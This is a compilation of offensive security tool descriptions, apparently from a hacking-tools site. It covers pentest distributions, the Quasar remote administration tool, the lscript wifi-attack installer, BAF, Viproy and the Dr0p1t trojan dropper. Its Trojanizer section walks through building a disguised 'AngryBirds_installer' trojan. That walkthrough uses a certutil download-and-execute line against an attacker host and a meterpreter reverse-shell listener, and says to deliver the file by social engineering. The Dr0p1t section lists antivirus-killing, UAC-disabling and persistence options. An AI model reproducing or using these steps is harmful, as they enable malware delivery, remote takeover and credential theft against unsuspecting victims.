BackBox is an Ubuntu-based Linux distribution oriented towards penetration testing and security assessment, providing a network and information systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
BlackArch is a penetration testing distribution based on Arch Linux that provides a large number of cyber security tools. It is an open-source distro created specifically for penetration testers and security researchers...
Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
The Trojanizer tool uses WinRAR (SFX) to compress the two files input by the user and transforms them into an SFX executable (.exe) archive. When the SFX archive is executed it will run both files (the payload and the legitimate application) at the same time.
To make the archive less suspicious to the target at execution time, Trojanizer will try to replace the default icon (.ico) of the SFX file with a user-selected one, and suppress all SFX archive dialog messages (Silent=1 | Overwrite=1).
Trojanizer will not build trojans, but from the target's perspective it replicates trojan behaviour
(execute the payload in the background while the legitimate application executes in the foreground).
DEPENDENCIES (backend applications)
Zenity (bash GUIs) | Wine (x86|x64) | WinRAR.exe (installed in Wine)
"Trojanizer.sh will download/install all dependencies as they are needed"
It is recommended to edit and configure the option SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.
PAYLOADS (agents) ACCEPTED
.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"
HINT: If 'SINGLE_EXEC=ON' is selected in the settings file, then Trojanizer will accept any kind of extension as input.
LEGIT APPLICATIONS ACCEPTED (decoys)
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"
ADVANCED SETTINGS
Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configured before running the main tool (Trojanizer.sh)
-- Presetup advanced option
Trojanizer can be configured to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allows users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs on the target system. If active, Trojanizer will ask (Zenity dialog) for the command to be executed
-- single_file_execution
Let's look at the following scenario: you have a DLL payload to input that you need to execute upon extraction, but SFX archives cannot execute DLL files directly. This setting allows users to input one batch script (.bat) that is going to be used to execute the DLL payload. All that Trojanizer needs to do is instruct the SFX archive to extract both files and then execute the script.bat
The single_file_execution switch's default behaviour is to compress the two files input by the user but only execute one of them at extraction time (the 2nd file input will be executed) ...
TROJANIZER AND APPL WHITELISTING BYPASSES
A lot of awesome work has been done by many people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows one-liners to download a remote payload and execute arbitrary code
The following exercise describes how to use the Trojanizer 'single_file_execution' and 'Presetup' advanced switches to drop (remote download) and execute any payload using 'certutil' or 'powershell' application-whitelisting-bypass one-liners ...
2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - run the Trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico
5º - start a listener, and send the SFX archive to the target using social engineering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
When the SFX archive is executed, it will download payload.exe from our apache2 webserver to the target and execute it before extracting 'screenshot.png' and 'AngryBirds.exe' (the latter will be executed to serve as decoy). The following one-liner uses the 'powershell (DownloadFile+start)' method to achieve the same as the previous 'certutil' exercise ..
Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.
Features
TCP network stream (IPv4 & IPv6 support)
Fast network serialization (NetSerializer)
Compressed (QuickLZ) & Encrypted (AES-128) communication
Multi-Threaded
UPnP Support
No-Ip.com Support
Visit Website (hidden & visible)
Show Messagebox
Task Manager
File Manager
Startup Manager
Remote Desktop
Remote Webcam
Remote Shell
Download & Execute
Upload & Execute
System Information
Computer Commands (Restart, Shutdown, Standby)
Keylogger (Unicode Support)
Reverse Proxy (SOCKS5)
Password Recovery (Common Browsers and FTP Clients)
Open the project in Visual Studio and click build, or use one of the batch files included in the root directory.
Batch file - Description
build-debug.bat - Builds the application using the debug configuration (for testing)
build-release.bat - Builds the application using the release configuration (for publishing)
Building a client
Build configuration - Description
debug configuration - The pre-defined Settings.cs will be used. The client builder does not work in this configuration. You can execute the client directly with the specified settings.
release configuration - Use the client builder to build your client, otherwise it is going to crash.
This is a script that automates many procedures around wifi penetration and hacking.
Features
Enabling/disabling interfaces faster
Changing MAC faster
Anonymizing yourself faster
View your public IP faster
View your MAC faster
TOOLS
You can install whichever tool(s) you want from within lscript!
Fluxion by Deltaxflux
WifiTe by derv82
Wifiphisher by Dan McInerney
Zatacker by LawrenceThePentester
Morpheus by Pedro ubuntu [ r00t-3xp10it ]
Osrframework by i3visio
Hakku by 4shadoww
Trity by Toxic-ig
Cupp by Muris Kurgas
Dracnmap by Edo -maland-
Fern Wifi Cracker by Savio-code
Kichthemout by Nikolaos Kamarinakis & David Schütz
BeeLogger by Alisson Moretto - 4w4k3
Ghost-Phisher by Savio-code
Mdk3-master by Musket Developer
Anonsurf by Und3rf10w
The Eye by EgeBalci
Airgeddon by v1s1t0r1sh3r3
Xerxes by zanyarjamal
Ezsploit by rand0m1ze
Katana framework by PowerScript
4nonimizer by Hackplayers
Sslstrip2 by LeonardoNve
Dns2proxy by LeonardoNve
Pupy by n1nj4sec
Zirikatu by pasahitz
TheFatRat by Sceetsec
Angry IP Scanner by Anton Keks
Sniper by 1N3
ReconDog by UltimateHackers
RED HAWK by Tuhinshubhra
Routersploit by Reverse shell
CHAOS by Tiagorlampert
Winpayloads by Ncc group
Email spoofing
Metasploit automation (create payloads,listeners,save listeners for later etc...)
Auto eternalblue exploiting (check on ks) -> hidden shortcuts
How to install (make sure you are a root user)
Be careful. If you download it as a .zip file, it will not run. Make sure to follow these simple instructions.
cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh
How to run it
(make sure you are a root user)
open terminal
type "l"
press enter
(Not even "lazy"!! Just "l"! The less you type, the better!)
How to uninstall
cd /root/lscript
./uninstall.sh
rm -r /root/lscript
How to update
Run the script
Type "update"
Things to keep in mind
1) you should be a root user to run the script
2) you should contact me if something doesn't work (write it on the "issues" tab at the top)
3) you should contact me if you want a feature to be added (write it on the "issues" tab at the top)
Video
It's a framework written in Python [2.7] that is being made specially for blind attacking, i.e. attacking random targets with common security issues; targets are generated by the hackers' search engine "shodan" and vulnerable hosts are hacked in an automated way.
This framework is completely "neutral", i.e. it is not based on the Shodan API and depends entirely on web scraping; the only limit on what you can do with it is your imagination as a tester and our programming skills as contributors/owners.
how to use BAF ?
fire up a terminal and run: sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
Viproy VoIP Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 was released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extensions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analysis modules.
Have you ever heard about trojan droppers? In short, a dropper is a type of trojan that downloads other malware, and Dr0p1t gives you the chance to create a dropper that bypasses most AVs and has some tricks ;)
Features
Framework works with Windows and Linux
Download executable on target system and execute it silently..
The executable size is small compared to other droppers generated the same way
Self-destruct function so that the dropper will kill and delete itself after finishing its work
Adding the executable to startup after downloading it
Adding the executable to task scheduler after downloading it (UAC doesn't matter)
Finding and killing the antivirus before running the malware
Running a custom (batch|powershell|vbs) file of your choice before running the executable
The ability to disable UAC
When running powershell scripts it can bypass the execution policy
Using UPX to compress the dropper after creating it
Choose an icon for the dropper after creating it
Screenshots
On Windows
On Linux (Backbox)
Help menu
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
The recommended version for Python 2 is 2.7.x, the recommended version for Python 3 is 3.5.x, and don't use 3.6 because it's not yet supported by PyInstaller